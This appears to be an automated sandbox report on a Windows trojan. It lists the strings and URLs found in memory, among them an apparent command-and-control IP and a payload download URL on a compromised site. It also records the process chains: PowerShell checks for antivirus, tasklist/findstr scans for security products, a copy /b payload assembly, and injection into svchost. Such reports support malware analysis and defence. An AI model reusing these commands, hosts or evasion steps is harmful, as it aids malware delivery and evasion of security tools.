Source: Flux.com, 00000014.00000000.2370366583.0000000000DE5000.00000002.00000001.01000000.0000000B.sdmp, Fo.9.dr, Flux.com.11.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: downloaded_exe.exe.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: svchost.exe, 00000017.00000002.2663181132.000000000043C000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2663745783.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, fontdrvhost.exe, 0000001B.00000002.2744428427.000001E32EC20000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5
Source: svchost.exe, 00000017.00000002.2663745783.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.2744428427.000001E32EC20000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5kernelbasentdllkernel32GetProcessMitigatio
Source: svchost.exe, 00000017.00000002.2663181132.000000000043C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5x
Source: powershell.exe, 00000007.00000002.2222225153.0000026303571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000017.00000003.2596668769.0000000002B9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-query
Source: svchost.exe, 00000017.00000003.2596668769.0000000002B9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
Source: powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: main.exe, 00000000.00000002.2313616960.0000023EC553F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ebitm.co.uk/
Source: main.exe	String found in binary or memory: https://ebitm.co.uk/salah/wp-includes/assets/ping.php
Source: main.exe, 00000000.00000002.2313616960.0000023EC5519000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ebitm.co.uk/salah/wp-includes/assets/ping.php=c
Source: main.exe	String found in binary or memory: https://ebitm.co.uk/salah/wp-includes/assets/ping.phpdownloaded_exe.exeopenbasic_string:
Source: main.exe	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: powershell.exe, 00000007.00000002.2222225153.0000026303799000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2222225153.00000263044FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2222225153.00000263048F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2222225153.0000026304E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000007.00000002.2222225153.0000026304981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000007.00000002.2222225153.0000026304981000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: Billion.9.dr, Flux.com.11.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: downloaded_exe.exe.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Flux.com.11.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

Source: unknown

HTTPS traffic detected: 185.199.220.71:443 -> 192.168.2.5:49726 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

Code function: 9_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

9_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

Code function: 9_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

9_2_004044D1

Source: svchost.exe, 00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_d0e60b12-1

Source: svchost.exe, 00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_84e42030-c

Source: Yara match	File source: 23.3.svchost.exe.4e10000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.svchost.exe.4bf0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000003.2579589232.0000000004BF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.2579847593.0000000004E10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR

Source: C:\Windows\System32\fontdrvhost.exe	Code function: 27_2_000001E32EC20AC8 NtAcceptConnectPort,NtAcceptConnectPort,	27_2_000001E32EC20AC8
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 27_2_000001E32EC21AA4 NtAcceptConnectPort,NtAcceptConnectPort,	27_2_000001E32EC21AA4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 27_2_000001E32EC21CF4 NtAcceptConnectPort,CloseHandle,	27_2_000001E32EC21CF4
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 27_2_000001E32EC215C0 NtAcceptConnectPort,	27_2_000001E32EC215C0

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

Code function: 9_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

9_2_004038AF

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	File created: C:\Windows\HandsLegally	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	File created: C:\Windows\CompaniesKitchen	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	File created: C:\Windows\TextObjective	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	File created: C:\Windows\BattlefieldBeliefs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	File created: C:\Windows\DressingThesaurus	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	File created: C:\Windows\MarshallCommunications	Jump to behavior

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE905FC0	0_2_00007FF7FE905FC0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE94CF30	0_2_00007FF7FE94CF30
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE917F70	0_2_00007FF7FE917F70
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE93DF70	0_2_00007FF7FE93DF70
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE91E0E0	0_2_00007FF7FE91E0E0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE944DC0	0_2_00007FF7FE944DC0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE92CE10	0_2_00007FF7FE92CE10
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE925DE0	0_2_00007FF7FE925DE0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE926BB8	0_2_00007FF7FE926BB8
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE92BC00	0_2_00007FF7FE92BC00
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9A2B40	0_2_00007FF7FE9A2B40
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE942B70	0_2_00007FF7FE942B70
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE938CD0	0_2_00007FF7FE938CD0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE900D00	0_2_00007FF7FE900D00
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE93CC50	0_2_00007FF7FE93CC50
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE94BC50	0_2_00007FF7FE94BC50
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE924C20	0_2_00007FF7FE924C20
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE904C60	0_2_00007FF7FE904C60
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE935C6D	0_2_00007FF7FE935C6D
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9079C0	0_2_00007FF7FE9079C0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE92E921	0_2_00007FF7FE92E921
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE945930	0_2_00007FF7FE945930
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE94A990	0_2_00007FF7FE94A990
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE910B00	0_2_00007FF7FE910B00
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE8FD810	0_2_00007FF7FE8FD810
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9327F0	0_2_00007FF7FE9327F0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE91D790	0_2_00007FF7FE91D790
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE939770	0_2_00007FF7FE939770
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE93B900	0_2_00007FF7FE93B900
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE92A820	0_2_00007FF7FE92A820
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE935860	0_2_00007FF7FE935860
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9405A0	0_2_00007FF7FE9405A0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE90E6C0	0_2_00007FF7FE90E6C0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9436C0	0_2_00007FF7FE9436C0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE93469D	0_2_00007FF7FE93469D
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9276AA	0_2_00007FF7FE9276AA
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE909710	0_2_00007FF7FE909710
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE918670	0_2_00007FF7FE918670
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9813D0	0_2_00007FF7FE9813D0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE94F410	0_2_00007FF7FE94F410
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE951330	0_2_00007FF7FE951330
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE92D47F	0_2_00007FF7FE92D47F
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE923470	0_2_00007FF7FE923470
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE8F51C0	0_2_00007FF7FE8F51C0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE91D1B0	0_2_00007FF7FE91D1B0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE94E1B0	0_2_00007FF7FE94E1B0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE901210	0_2_00007FF7FE901210
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE9122D0	0_2_00007FF7FE9122D0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE931230	0_2_00007FF7FE931230
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE93F280	0_2_00007FF7FE93F280
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE934290	0_2_00007FF7FE934290
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7FE944270	0_2_00007FF7FE944270
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: 9_2_0040737E	9_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: 9_2_00406EFE	9_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: 9_2_004079A2	9_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: 9_2_004049A8	9_2_004049A8
Source: C:\Windows\System32\fontdrvhost.exe	Code function: 27_2_000001E32EC20C70	27_2_000001E32EC20C70

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\542181\Flux.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\main.exe	Code function: String function: 00007FF7FE9BB090 appears 87 times
Source: C:\Users\user\Desktop\main.exe	Code function: String function: 00007FF7FE8FFDF0 appears 32 times
Source: C:\Users\user\Desktop\main.exe	Code function: String function: 00007FF7FE9BB180 appears 77 times
Source: C:\Users\user\Desktop\main.exe	Code function: String function: 00007FF7FE9BB220 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Code function: String function: 004062CF appears 58 times

Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 968

Source: main.exe

Static PE information: Number of sections : 20 > 10

Source: classification engine

Classification label: mal100.troj.evad.winEXE@40/42@2/2

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

9_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

Code function: 9_2_004024FB CoCreateInstance,

9_2_004024FB

Source: C:\Users\user\Desktop\main.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ping[1].php

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1084:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-9b8d4256-c832-6aaaf5-23963194fd2a}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03

Source: C:\Users\user\Desktop\main.exe

File created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

Jump to behavior

Source: main.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\main.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\main.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: main.exe

Virustotal: Detection: 6%

Source: unknown	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "(Get-CimInstance Win32_Processor).Name"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "(Get-CimInstance Win32_VideoController).Name"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "try { $avProducts = Get-CimInstance -Namespace 'root/SecurityCenter2' -Class AntiVirusProduct \| Select-Object -ExpandProperty displayName; if ($avProducts) { $avProducts } else { 'No antivirus software detected' } } catch { 'Error detecting antivirus software' }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe"
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 542181
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "exports" Fleece
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier b
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\542181\Flux.com Flux.com b
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 968
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\System32\fontdrvhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 140
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "(Get-CimInstance Win32_Processor).Name"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "(Get-CimInstance Win32_VideoController).Name"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "try { $avProducts = Get-CimInstance -Namespace 'root/SecurityCenter2' -Class AntiVirusProduct \| Select-Object -ExpandProperty displayName; if ($avProducts) { $avProducts } else { 'No antivirus software detected' } } catch { 'Error detecting antivirus software' }"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 542181	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "exports" Fleece	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier b	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\542181\Flux.com Flux.com b	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\542181\Flux.com	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"

Source: C:\Users\user\Desktop\main.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
